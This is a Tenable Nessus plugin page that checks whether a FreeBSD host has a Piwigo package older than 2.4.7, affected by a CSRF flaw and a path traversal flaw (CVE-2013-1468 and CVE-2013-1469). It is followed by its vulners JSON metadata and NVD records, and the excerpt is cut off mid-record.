ID FREEBSD_PKG_EDD201A58FC311E2B131000C299B62E1.NASL Type nessus Reporter This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2013-03-20T00:00:00
Description
High-Tech Bridge Security Research Lab reports :
The CSRF vulnerability exists due to insufficient verification of the
HTTP request origin in the '/admin.php' script. A remote attacker can
trick a logged-in administrator into visiting a specially crafted webpage
and thereby create an arbitrary PHP file on the remote server.
The path traversal vulnerability exists due to insufficient filtering
of user-supplied input in the 'dl' HTTP GET parameter passed to the
'/install.php' script. The script is present on the system after
installation by default, and can be accessed by an attacker without any
restrictions.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
# copyright notice, this list of conditions and the following
# disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
# published online in any format, converted to PDF, PostScript,
# RTF and other formats) must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Metadata stage: when 'description' is set, only the attributes below are
# registered and the script stops at exit(0), so the package check that
# follows this block is not reached.
if (description)
{
  # Plugin identity and revision.
  script_id(65624);
  script_version("1.7");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  # One package check covers both CVEs.
  script_cve_id("CVE-2013-1468", "CVE-2013-1469");

  script_name(english:"FreeBSD : piwigo -- CSRF/Path Traversal (edd201a5-8fc3-11e2-b131-000c299b62e1)");
  script_summary(english:"Checks for updated package in pkg_info output");

  script_set_attribute(attribute:"synopsis", value:"The remote FreeBSD host is missing a security-related update.");

  # Advisory text shown in the finding. The literal spans several lines;
  # its continuation lines stay at column 0 so that no extra whitespace
  # ends up inside the string.
  script_set_attribute(attribute:"description", value:
"High-Tech Bridge Security Research Lab reports :
The CSRF vulnerability exists due to insufficient verification of the
HTTP request origin in '/admin.php' script. A remote attacker can
trick a logged-in administrator to visit a specially crafted webpage
and create arbitrary PHP file on the remote server.
The path traversal vulnerability exists due to insufficient filtration
of user-supplied input in 'dl' HTTP GET parameter passed to
'/install.php' script. The script is present on the system after
installation by default, and can be accessed by attacker without any
restrictions.");

  # References: the two upstream bug tracker entries first.
  script_set_attribute(attribute:"see_also", value:"http://piwigo.org/bugs/view.php?id=0002843");
  script_set_attribute(attribute:"see_also", value:"http://piwigo.org/bugs/view.php?id=0002844");
  # Short link for:
  # http://dl.packetstormsecurity.net/1302-exploits/piwigo246-traversalxsrf.txt
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?505a28f2");
  # Short link for:
  # https://vuxml.freebsd.org/freebsd/edd201a5-8fc3-11e2-b131-000c299b62e1.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f2e0ceeb");

  script_set_attribute(attribute:"solution", value:"Update the affected package.");

  # CVSS v2 base vector for the finding as a whole. It is the vector NVD
  # lists for CVE-2013-1468 (base score 7.6), the higher-scored of the two
  # CVEs; NVD scores CVE-2013-1469 at 4.0 (AV:N/AC:H/Au:N/C:P/I:N/A:P).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");

  # "local": the verdict is derived from the host's package list (see the
  # required KB keys below), not from probing the web application.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:piwigo");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");

  # Disclosure, fix and plugin release dates.
  script_set_attribute(attribute:"vuln_publication_date", value:"2013/02/06");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/03/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/03/20");
  script_end_attributes();

  # Scheduling information for the scanner.
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"FreeBSD Local Security Checks");

  # NOTE(review): ssh_get_info.nasl presumably populates the Host/* KB keys
  # required here; confirm against that plugin.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");

  exit(0);
}
include("audit.inc");
include("freebsd_package.inc");
# Preconditions, each read from the knowledge base: local checks must be
# enabled, the host must be identified as FreeBSD, and a package list must
# have been collected. A missing key ends the run through audit().
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release"))
  audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

# Version-only verdict: a hit means the installed piwigo package is older
# than 2.4.7. It does not show that either flaw is reachable on this host.
# Per the HTB23144 advisory, the CSRF (CVE-2013-1468) requires the
# "LocalFiles Editor" plugin to be enabled (disabled by default), and the
# traversal (CVE-2013-1469) was reported as working on PHP for Windows.
# Use that for triage; the remediation is still to update the package.
outdated = pkg_test(save_report:TRUE, pkg:"piwigo<2.4.7");

if (!outdated)
  audit(AUDIT_HOST_NOT, "affected");
else
{
  # Attach the package report only when the scan asks for verbose output.
  if (report_verbosity > 0)
    security_hole(port:0, extra:pkg_report_get());
  else
    security_hole(0);
  exit(0);
}
{"id": "FREEBSD_PKG_EDD201A58FC311E2B131000C299B62E1.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : piwigo -- CSRF/Path Traversal (edd201a5-8fc3-11e2-b131-000c299b62e1)", "description": "High-Tech Bridge Security Research Lab reports :\n\nThe CSRF vulnerability exists due to insufficient verification of the\nHTTP request origin in '/admin.php' script. A remote attacker can\ntrick a logged-in administrator to visit a specially crafted webpage\nand create arbitrary PHP file on the remote server.\n\nThe path traversal vulnerability exists due to insufficient filtration\nof user-supplied input in 'dl' HTTP GET parameter passed to\n'/install.php' script. The script is present on the system after\ninstallation by default, and can be accessed by attacker without any\nrestrictions.", "published": "2013-03-20T00:00:00", "modified": "2013-03-20T00:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/65624", "reporter": "This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://piwigo.org/bugs/view.php?id=0002843", "http://www.nessus.org/u?505a28f2", "http://www.nessus.org/u?f2e0ceeb", "http://piwigo.org/bugs/view.php?id=0002844"], "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "type": "nessus", "lastseen": "2021-01-07T10:51:20", "edition": 23, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1468", "CVE-2013-1469"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803340"]}, {"type": "zdt", "idList": ["1337DAY-ID-20461"]}, {"type": "exploitdb", "idList": ["EDB-ID:24520", "EDB-ID:24561"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12923", "SECURITYVULNS:DOC:29128"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120592", "PACKETSTORM:129665"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FC43DD51AE00C5F5F8AE623AD85B84A9", "EXPLOITPACK:35BF0A351E54F0662E6298A2615F1201"]}, {"type": "htbridge", "idList": ["HTB23144"]}, {"type": "freebsd", "idList": ["EDD201A5-8FC3-11E2-B131-000C299B62E1"]}, {"type": "zeroscience", "idList": ["ZSL-2013-5127"]}, {"type": "nessus", "idList": ["PIWIGO_INSTALL_FILE_DISCLOSURE.NASL"]}], "modified": "2021-01-07T10:51:20", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-01-07T10:51:20", "rev": 2}, "vulnersScore": 5.9}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65624);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-1468\", \"CVE-2013-1469\");\n\n script_name(english:\"FreeBSD : piwigo -- CSRF/Path Traversal (edd201a5-8fc3-11e2-b131-000c299b62e1)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"High-Tech Bridge Security Research Lab reports :\n\nThe CSRF vulnerability exists due to insufficient verification of the\nHTTP request origin in '/admin.php' script. 
A remote attacker can\ntrick a logged-in administrator to visit a specially crafted webpage\nand create arbitrary PHP file on the remote server.\n\nThe path traversal vulnerability exists due to insufficient filtration\nof user-supplied input in 'dl' HTTP GET parameter passed to\n'/install.php' script. The script is present on the system after\ninstallation by default, and can be accessed by attacker without any\nrestrictions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://piwigo.org/bugs/view.php?id=0002843\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://piwigo.org/bugs/view.php?id=0002844\"\n );\n # http://dl.packetstormsecurity.net/1302-exploits/piwigo246-traversalxsrf.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?505a28f2\"\n );\n # https://vuxml.freebsd.org/freebsd/edd201a5-8fc3-11e2-b131-000c299b62e1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2e0ceeb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:piwigo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"piwigo<2.4.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "65624", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:piwigo"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:52:39", "description": "Directory traversal vulnerability in install.php in Piwigo before 2.4.7 allows remote attackers to read and delete arbitrary files via a .. (dot dot) in the dl parameter.", "edition": 5, "cvss3": {}, "published": "2013-03-13T20:55:00", "title": "CVE-2013-1469", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1469"], "modified": "2013-03-19T04:00:00", "cpe": ["cpe:/a:piwigo:piwigo:1.7.0", "cpe:/a:piwigo:piwigo:2.0.9", "cpe:/a:piwigo:piwigo:1.7.1", "cpe:/a:piwigo:piwigo:2.2.3", "cpe:/a:piwigo:piwigo:2.3.4", "cpe:/a:piwigo:piwigo:2.0.10", "cpe:/a:piwigo:piwigo:1.3.1", "cpe:/a:piwigo:piwigo:1.2.1", "cpe:/a:piwigo:piwigo:2.1.1", "cpe:/a:piwigo:piwigo:1.1.0", "cpe:/a:piwigo:piwigo:2.1.2", "cpe:/a:piwigo:piwigo:1.0.1", "cpe:/a:piwigo:piwigo:2.0.1", "cpe:/a:piwigo:piwigo:2.1.0", "cpe:/a:piwigo:piwigo:2.2.4", "cpe:/a:piwigo:piwigo:1.6.0", "cpe:/a:piwigo:piwigo:1.6.1", "cpe:/a:piwigo:piwigo:2.3.2", "cpe:/a:piwigo:piwigo:1.7.3", "cpe:/a:piwigo:piwigo:1.6.2", "cpe:/a:piwigo:piwigo:1.2.0", "cpe:/a:piwigo:piwigo:2.0.7", "cpe:/a:piwigo:piwigo:2.4.4", "cpe:/a:piwigo:piwigo:2.4.6", "cpe:/a:piwigo:piwigo:2.2.0", "cpe:/a:piwigo:piwigo:2.1.5", "cpe:/a:piwigo:piwigo:2.3.3", "cpe:/a:piwigo:piwigo:2.0.8", "cpe:/a:piwigo:piwigo:2.4.1", "cpe:/a:piwigo:piwigo:1.3.3", "cpe:/a:piwigo:piwigo:1.4.0", "cpe:/a:piwigo:piwigo:2.0.5", "cpe:/a:piwigo:piwigo:1.5.2", "cpe:/a:piwigo:piwigo:2.1.6", "cpe:/a:piwigo:piwigo:1.0.0", 
"cpe:/a:piwigo:piwigo:1.3.0", "cpe:/a:piwigo:piwigo:2.2.1", "cpe:/a:piwigo:piwigo:2.4.2", "cpe:/a:piwigo:piwigo:2.4.5", "cpe:/a:piwigo:piwigo:1.3.2", "cpe:/a:piwigo:piwigo:2.0.4", "cpe:/a:piwigo:piwigo:2.0.6", "cpe:/a:piwigo:piwigo:2.1.3", "cpe:/a:piwigo:piwigo:1.0.2", "cpe:/a:piwigo:piwigo:1.5.0", "cpe:/a:piwigo:piwigo:2.3.5", "cpe:/a:piwigo:piwigo:1.5.1", "cpe:/a:piwigo:piwigo:2.0", "cpe:/a:piwigo:piwigo:1.3.4", "cpe:/a:piwigo:piwigo:2.1.4", "cpe:/a:piwigo:piwigo:2.0.3", "cpe:/a:piwigo:piwigo:1.7.2", "cpe:/a:piwigo:piwigo:2.2.5", "cpe:/a:piwigo:piwigo:2.3.0", "cpe:/a:piwigo:piwigo:2.4.3", "cpe:/a:piwigo:piwigo:2.0.0", "cpe:/a:piwigo:piwigo:2.2.2", "cpe:/a:piwigo:piwigo:2.0.2", "cpe:/a:piwigo:piwigo:2.3.1", "cpe:/a:piwigo:piwigo:2.4.0", "cpe:/a:piwigo:piwigo:1.4.1"], "id": "CVE-2013-1469", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1469", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:piwigo:piwigo:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.5:*:*:*:*:*:*:*", 
"cpe:2.3:a:piwigo:piwigo:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:39", "description": "Cross-site request forgery (CSRF) vulnerability in the LocalFiles Editor plugin in Piwigo before 2.4.7 allows 
remote attackers to hijack the authentication of administrators for requests that create arbitrary PHP files via unspecified vectors.", "edition": 5, "cvss3": {}, "published": "2013-03-14T03:13:00", "title": "CVE-2013-1468", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1468"], "modified": "2013-10-03T18:49:00", "cpe": ["cpe:/a:piwigo:piwigo:1.7.0", "cpe:/a:piwigo:piwigo:2.0.9", "cpe:/a:piwigo:piwigo:1.7.1", "cpe:/a:piwigo:piwigo:2.2.3", "cpe:/a:piwigo:piwigo:2.3.4", "cpe:/a:piwigo:piwigo:2.0.10", "cpe:/a:piwigo:piwigo:1.3.1", "cpe:/a:piwigo:piwigo:1.2.1", "cpe:/a:piwigo:piwigo:2.1.1", "cpe:/a:piwigo:piwigo:1.1.0", "cpe:/a:piwigo:piwigo:2.1.2", "cpe:/a:piwigo:piwigo:1.0.1", "cpe:/a:piwigo:piwigo:2.0.1", "cpe:/a:piwigo:piwigo:2.1.0", "cpe:/a:piwigo:piwigo:2.2.4", "cpe:/a:piwigo:piwigo:1.6.0", "cpe:/a:piwigo:piwigo:1.6.1", "cpe:/a:piwigo:piwigo:2.3.2", "cpe:/a:piwigo:piwigo:1.7.3", "cpe:/a:piwigo:piwigo:1.6.2", "cpe:/a:piwigo:piwigo:1.2.0", "cpe:/a:piwigo:piwigo:2.0.7", "cpe:/a:piwigo:piwigo:2.4.4", "cpe:/a:piwigo:piwigo:2.4.6", "cpe:/a:piwigo:piwigo:2.2.0", "cpe:/a:piwigo:piwigo:2.1.5", "cpe:/a:piwigo:piwigo:2.3.3", "cpe:/a:piwigo:piwigo:2.0.8", "cpe:/a:piwigo:piwigo:2.4.1", "cpe:/a:piwigo:piwigo:1.3.3", "cpe:/a:piwigo:piwigo:1.4.0", "cpe:/a:piwigo:piwigo:2.0.5", "cpe:/a:piwigo:piwigo:1.5.2", "cpe:/a:piwigo:piwigo:2.1.6", "cpe:/a:piwigo:piwigo:1.0.0", "cpe:/a:piwigo:piwigo:1.3.0", "cpe:/a:piwigo:piwigo:2.2.1", "cpe:/a:piwigo:piwigo:2.4.2", 
"cpe:/a:piwigo:piwigo:2.4.5", "cpe:/a:piwigo:piwigo:1.3.2", "cpe:/a:piwigo:piwigo:2.0.4", "cpe:/a:piwigo:piwigo:2.0.6", "cpe:/a:piwigo:piwigo:2.1.3", "cpe:/a:piwigo:piwigo:1.0.2", "cpe:/a:piwigo:piwigo:1.5.0", "cpe:/a:piwigo:piwigo:2.3.5", "cpe:/a:piwigo:piwigo:1.5.1", "cpe:/a:piwigo:piwigo:2.0", "cpe:/a:piwigo:piwigo:1.3.4", "cpe:/a:piwigo:piwigo:2.1.4", "cpe:/a:piwigo:piwigo:2.0.3", "cpe:/a:piwigo:piwigo:1.7.2", "cpe:/a:piwigo:piwigo:2.2.5", "cpe:/a:piwigo:piwigo:2.3.0", "cpe:/a:piwigo:piwigo:2.4.3", "cpe:/a:piwigo:piwigo:2.0.0", "cpe:/a:piwigo:piwigo:2.2.2", "cpe:/a:piwigo:piwigo:2.0.2", "cpe:/a:piwigo:piwigo:2.3.1", "cpe:/a:piwigo:piwigo:2.4.0", "cpe:/a:piwigo:piwigo:1.4.1"], "id": "CVE-2013-1468", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1468", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:piwigo:piwigo:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.2:*:*:*:*:*:*:*", 